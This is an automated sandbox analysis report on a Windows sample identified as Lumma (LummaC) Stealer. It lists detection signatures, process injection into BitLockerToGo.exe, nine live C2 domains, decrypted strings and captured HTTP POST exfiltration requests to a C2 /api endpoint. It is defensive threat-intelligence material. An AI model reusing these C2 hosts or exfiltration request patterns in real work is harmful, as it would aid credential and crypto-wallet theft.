Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6xmBUtHylU.exe

Overview

General Information

Sample name:6xmBUtHylU.exe
renamed because original name is a hash value
Original sample name:b82c80a3ce9b5c44391d3f11307f8b8e.exe
Analysis ID:1467945
MD5:b82c80a3ce9b5c44391d3f11307f8b8e
SHA1:7480059bc051383eaaf0d83b7f39d7c4989e4dea
SHA256:ce9b5ec3693188ed91e363e55286cd212f44912b042bd83a924af2f43daaa55f
Tags:64exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6xmBUtHylU.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\6xmBUtHylU.exe" MD5: B82C80A3CE9B5C44391D3F11307F8B8E)
    • BitLockerToGo.exe (PID: 3800 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "citizencenturygoodwk.shop"], "Build id": "LPnhqo--@SEFYALUV"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://citizencenturygoodwk.shop:443/apiAvira URL Cloud: Label: malware
              Source: https://citizencenturygoodwk.shop/apiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 3.2.BitLockerToGo.exe.230000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["benchillppwo.shop", "publicitttyps.shop", "answerrsdo.shop", "radiationnopp.shop", "affecthorsedpo.shop", "bargainnykwo.shop", "bannngwko.shop", "bouncedgowp.shop", "citizencenturygoodwk.shop"], "Build id": "LPnhqo--@SEFYALUV"}
              Multi AV Scanner detection for domain / URL
              Source: citizencenturygoodwk.shopVirustotal: Detection: 9%Perma Link
              Multi AV Scanner detection for submitted file
              Source: 6xmBUtHylU.exeReversingLabs: Detection: 42%
              Source: 6xmBUtHylU.exeVirustotal: Detection: 30%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: benchillppwo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: publicitttyps.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: answerrsdo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: radiationnopp.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: affecthorsedpo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bargainnykwo.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bannngwko.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: bouncedgowp.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: citizencenturygoodwk.shop
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmpString decryptor: LPnhqo--@SEFYALUV
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00246CD0 CryptUnprotectData,3_2_00246CD0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: 6xmBUtHylU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0024E880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00248088
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+68h]3_2_0024709B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx3_2_0024709B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00250BD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+24h], 0000005Ch3_2_00263425
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]3_2_00239C30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00258C4B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]3_2_0023F490
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_00265512
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_0024662A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h3_2_0024AF90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]3_2_00246790
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [00273570h]3_2_0025302C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebp3_2_00231072
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+00000124h], ecx3_2_00258087
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]3_2_002400F1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00255920
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi+eax*4], dx3_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]3_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi3_2_0023C113
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_00253142
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_002699C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_00256A83
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi3_2_0024F283
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx3_2_00245A90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0023E2D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_00233350
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]3_2_0024ABB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00260B80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+24h]3_2_002403C8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax3_2_00267442
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00232CA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]3_2_00252C9D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_00269CE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]3_2_002504D6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]3_2_00239510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]3_2_00239510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00233510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, edx3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_002586C4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]3_2_002586C7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al3_2_002397D0

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: benchillppwo.shop
              Source: Malware configuration extractorURLs: publicitttyps.shop
              Source: Malware configuration extractorURLs: answerrsdo.shop
              Source: Malware configuration extractorURLs: radiationnopp.shop
              Source: Malware configuration extractorURLs: affecthorsedpo.shop
              Source: Malware configuration extractorURLs: bargainnykwo.shop
              Source: Malware configuration extractorURLs: bannngwko.shop
              Source: Malware configuration extractorURLs: bouncedgowp.shop
              Source: Malware configuration extractorURLs: citizencenturygoodwk.shop
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12863Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15109Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19967Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7100Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1264Host: citizencenturygoodwk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584888Host: citizencenturygoodwk.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: citizencenturygoodwk.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: citizencenturygoodwk.shop
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/.
              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/4Y
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279500194.0000000002896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api9(
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api=/
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiP
              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiU6
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiX
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apie6-
              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/ez
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/z
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop:443/api
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop:443/apiK
              Source: BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: 6xmBUtHylU.exeString found in binary or memory: https://login.chinacloudapi.cn/http2:
              Source: 6xmBUtHylU.exeString found in binary or memory: https://login.microsoftonline.com/stream
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.azure.cominvalid
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.chinacloudapi.cnCONTINUATION
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.core.chinacloudapi.cnFrame
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.core.usgovcloudapi.nethttp2:
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.usgovcloudapi.nethttps://management.core.windows.net/
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: BitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
